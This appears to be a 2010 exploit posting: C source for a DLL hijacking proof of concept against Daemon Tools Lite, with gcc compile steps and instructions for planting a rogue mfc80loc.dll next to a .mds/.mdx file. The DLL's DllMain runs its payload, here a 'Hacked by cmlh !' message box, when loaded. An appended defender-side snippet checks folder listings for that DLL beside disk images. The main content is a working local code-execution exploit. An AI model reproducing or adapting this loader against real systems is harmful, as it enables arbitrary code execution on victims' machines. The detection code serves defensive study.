daemontoolsexploit.c

posted: Aug, 29th 2010

/*
 
Daemon Tools Lite <= 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit
 
	Found by: Christian Heinrich (cmlh)
	Exploit by: Christian Heinrich (cmlh)
 
	Email: christianheinrich@live.com
	Web: http://www.twitter.com/cmlh
 
	Summary: Daemon Tools is a disk image mounting application for Microsoft Windows.
 
	Description: Daemon Tools suffers from a dll hijacking vulnerability
	that enables the attacker to execute arbitrary code on a local
	level through the .MDS and .MDX extensions.
 
----
 
Howto:
 
gcc -shared -o mfc80loc.dll daemontoolsexploit.c
 
Compile this file and rename the output to mfc80loc.dll.
 
Then create an empty file named anything.mds or anything.mdx, or create a
legitimate image.
 
Double-clicking the .mds/.mdx file with the mfc80loc.dll file in the same folder will execute
our code.
 
----
 
Tested on Microsoft Windows 7 / XP sp 3
 
Vulnerability discovered by Christian Heinrich (cmlh)
 
 
christianheinrich@live.com
 
27.08.2010
 
*/
 
 
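#include <windows.h>
 
/* Forward declaration so DllMain can call the payload defined below. */
int dll_mll(void);
 
BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
	switch (fdwReason)
	{
		/* Runs once, when the host process loads the DLL. */
		case DLL_PROCESS_ATTACH:
		dll_mll();
		break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}
 
	return TRUE;
}
 
/* Proof-of-concept payload: shows a message box and nothing else. */
int dll_mll(void)
{
	MessageBox(0, "Hacked by cmlh !", "DLL Message", MB_OK);
	return 0;
}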
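
A defender-side triage check for the condition the Howto describes, a .mds/.mdx image sitting in the same folder as mfc80loc.dll (added example, not part of the original snippet or the author's code). The helper names and the sample listings are assumptions constructed for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive equality; Windows file names are not case sensitive. */
static int ieq(const char *a, const char *b)
{
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++; b++;
    }
    return *a == *b;
}

/* 1 if the final extension is .mds or .mdx, as named in the advisory. */
static int is_image_trigger(const char *name)
{
    const char *dot = strrchr(name, '.');
    return dot != NULL && (ieq(dot, ".mds") || ieq(dot, ".mdx"));
}

/* Hypothetical helper: number of image files in a folder listing that
 * share the folder with mfc80loc.dll, or 0 when that DLL is absent. */
int count_exposed_images(const char *const names[], size_t n)
{
    size_t i;
    int images = 0, dll_present = 0;

    for (i = 0; i < n; i++) {
        if (ieq(names[i], "mfc80loc.dll"))
            dll_present = 1;
        else if (is_image_trigger(names[i]))
            images++;
    }
    return dll_present ? images : 0;
}

/* Constructed sample listings, not taken from a real system. */
static const char *const share_a[] = { "setup.MDS", "setup.mdf", "MFC80LOC.DLL", "readme.txt" };
static const char *const share_b[] = { "backup.mdx", "notes.mds.txt", "mfc80loc.dll.bak" };

int main(void)
{
    printf("share_a: %d exposed image(s)\n", count_exposed_images(share_a, 4));
    printf("share_b: %d exposed image(s)\n", count_exposed_images(share_b, 3));
    return 0;
}
```

A non-zero result is a lead for review rather than proof of tampering; the DLL found beside the image still has to be inspected.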